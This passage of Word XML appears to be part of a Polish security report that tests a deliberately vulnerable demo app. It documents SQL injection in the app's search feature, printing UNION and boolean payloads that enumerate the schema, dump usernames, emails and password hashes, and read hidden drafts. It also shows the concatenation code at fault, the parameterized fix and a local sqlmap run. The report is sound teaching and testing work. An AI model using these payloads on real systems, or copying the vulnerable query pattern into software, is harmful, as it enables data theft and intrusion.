      </w:r>
      <w:r>
        <w:t xml:space="preserve">, którego sekret zaczyna się od litery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' OR EXISTS(SELECT 1 FROM users WHERE username='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admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' AND substr(password_hash,1,1)='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03" w:name="lst3"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 3. Fragment zapytania lub payloadu SQL. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2003"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W trybie vulnerable wyszukiwarka nagle zwraca rekordy, mimo że fraza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> normalnie niczego nie znajduje. Atakujący wie, że potrafi wykonywać warunki zależne od tabeli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Następnie atakujący używa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> do rozpoznania schematu SQLite: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT 1, name, sql, 1, '', '', '' FROM sqlite_master WHERE type='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table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04" w:name="lst4"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 4. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2004"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Przeglądarka wysyła żądanie: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?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>q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z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>z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q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q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_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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2005" w:name="lst5"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 5. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2005"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W wyniku widać nazwy tabel oraz instrukcje </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>blog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. To jest etap rozpoznania: atakujący wie już, że warto celować w tabelę </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Drugi payload wyciąga rekordy użytkowników, podstawiając </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jako tytuł wyniku, a hasło/hash i email jako treść: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT id, '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user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' || username,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'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role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' || role || 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email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' || email || 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secret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' || password_hash,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1, username, '', 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FROM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06" w:name="lst6"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 6. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2006"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Trzeci payload pokazuje wyciek danych nieopublikowanych. Normalna wyszukiwarka powinna pokazywać tylko </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>published = 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ale podatna ścieżka pozwala dobrać dane bezpośrednio z tabeli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>blog</w:t>
      </w:r>
      <w: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT id, '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draft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' || title, post_content, published, author_username, '', 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FROM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blog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WHERE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published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0E7490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07" w:name="lst7"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 7. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2007"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:t>W trybie vulnerable warstwa serwisowa buduje SQL przez konkatenację.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing A.1 - kod niezabezpieczony: SQL budowany przez konkatenację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sqlQuery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"SELECT id, title, post_content, published, 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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"COALESCE(author_username, ''), COALESCE(attachment_path, ''), COALESCE(attachment_name, '') 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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"FROM blog WHERE title LIKE '%"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"%' OR post_content LIKE '%"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"%'"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rows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sqlQuery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08" w:name="lst8"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 8. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2008"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload zamyka wzorzec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dopina własny warunek lub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i komentuje resztę oryginalnego zapytania. W efekcie zwykła funkcja biblioteki zamienia się w kanał odczytu struktury bazy, kont użytkowników oraz ukrytych wpisów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warianty rozszerzone:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kolumny i kształt zapytania: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ORDER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E7490"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8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09" w:name="lst9"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 9. Fragment zapytania lub payloadu SQL. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2009"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">W trybie vulnerable aplikacja zwraca błąd SQL z informacją o niepoprawnym indeksie kolumny. To pokazuje, że atakujący nie strzela losowo, tylko rozpoznaje liczbę kolumn potrzebną do późniejszego </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Jednowierszowy raport o bazie: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT 9000, '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intel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database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map</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>',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'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>users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' || (SELECT COUNT(*) FROM users) ||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tables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' || (SELECT group_concat(name, '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') FROM sqlite_master WHERE type='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table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'),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1, '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="BE185D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bot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>', '', 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10" w:name="lst10"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 10. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2010"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Wynik wygląda jak zwykły rekord wyszukiwarki, ale treść została zbudowana przez podzapytania SQL. Atakujący dostaje liczbę użytkowników i listę tabel w jednym wierszu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Fingerprint silnika bazy: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT 9001, '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fingerprint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SQLite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' || sqlite_version(),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sqlite_source_id(), 1, '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="BE185D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bot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>', '', 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11" w:name="lst11"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 11. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2011"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ten payload pokazuje wersję SQLite i identyfikator źródłowy. W realnym incydencie taki fingerprint pomaga dobrać dalsze techniki pod konkretny silnik.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Pivot z konta administratora do ukrytych draftów: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT 9002, '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pivot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' || username || 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owns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drafts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>',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(SELECT group_concat(title, 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') FROM blog WHERE published=0),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1, username, '', ''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>FROM users WHERE role='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admin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12" w:name="lst12"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 12. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2012"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ten wariant pokazuje pełny wpływ podatności: wynik wygląda jak rekord powiązany z administratorem, a w treści pojawia się lista nieopublikowanych wpisów.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9146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qli-vulnerab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16" w:name="fig16"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 16. SQL Injection vulnerable. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1016"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ten sam krok w trybie secure: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Użytkownik zostaje na tej samej funkcji </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/library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 xml:space="preserve">Wpisuje te same payloady: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sonda logiczna, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t>, fingerprint, raport bazy i ukryty draft.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Serwer używa parametru </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, więc każdy payload jest tekstem w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t>, a nie składnią SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing A.2 - kod zabezpieczony: parametryzacja zapytania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pattern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"%"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"%"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rows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`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SELECT id, title, post_content, published,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       COALESCE(author_username, ''),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       COALESCE(attachment_path, ''),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       COALESCE(attachment_name, '')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FROM blog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WHERE published = 1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  AND (title LIKE ? OR post_content LIKE ?)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>`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pattern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pattern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13" w:name="lst13"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 13. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2013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9146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qli-sec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17" w:name="fig17"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 17. SQL Injection secure. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1017"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ocena rezultatu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> naprawa nie ukrywa pola wyszukiwania i nie zmienia ścieżki użytkownika. Ta sama funkcja działa dalej, ale input nie może już zmienić struktury zapytania SQL. Wersja secure blokuje cały łańcuch: rozpoznanie liczby kolumn, enumerację schematu, fingerprint silnika, wyciek użytkowników i wyciek draftów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="22" w:name="sec22"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.2. Atak z użyciem narzędzia zewnętrznego</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">SQL Injection zweryfikowano dodatkowo przy użyciu narzędzia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Test wykonano na publicznym endpointcie wyszukiwarki, czyli na tej samej funkcji, której używa ekran </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vocaloid library</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Komenda użyta w trybie vulnerable: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sqlmap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-u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"http://127.0.0.1:8099/api/search?q=Miku"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--batch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--level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0E7490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--risk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0E7490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--dbms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SQLite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--technique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BEU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--flush-session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--tables</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2014" w:name="lst14"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 14. Komenda sqlmap potwierdzająca podatność SQL Injection. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2014"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Wynik narzędzia potwierdził, że parametr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jest podatny. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wykrył wariant boolean-based blind oraz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, rozpoznał 7 kolumn w zapytaniu, zidentyfikował backend jako SQLite i pobrał listę tabel: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>blog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlite_sequence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t>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0394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map-library-sql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39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18" w:name="fig18"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 18. sqlmap - wykrycie SQL Injection. Źródło: wynik narzędzia sqlmap uruchomionego lokalnie.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1018"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ten sam test po przełączeniu aplikacji w tryb secure nie znalazł podatnego parametru. Narzędzie zakończyło pracę komunikatem, że testowane parametry nie wyglądają na podatne. Jest to zgodne z implementacją: payloady pozostają wartością parametru </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t>, a nie składnią SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Fragment wyniku dla trybu secure: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[INFO] testing for SQL injection on GET parameter 'q'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[WARNING] GET parameter 'q' does not seem to be injectable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[ERROR] all tested parameters do not appear to be injectable</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2015" w:name="lst15"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 15. Fragment materiału testowego (text). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2015"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Znaczenie tego testu jest praktyczne: ręczny scenariusz pokazuje dokładnie, jak działa atak i skąd biorą się wyniki, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> potwierdza, że podatność jest wykrywalna również narzędziem automatycznym używanym w testach penetracyjnych. W raporcie zachowano oba podejścia, ponieważ samo narzędzie nie wyjaśnia mechanizmu błędu, a ręczne przejście przez payloady nie zastępuje zewnętrznej weryfikacji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Weryfikacja żądań przy użyciu curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Drugim zewnętrznym klientem użytym w projekcie był </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
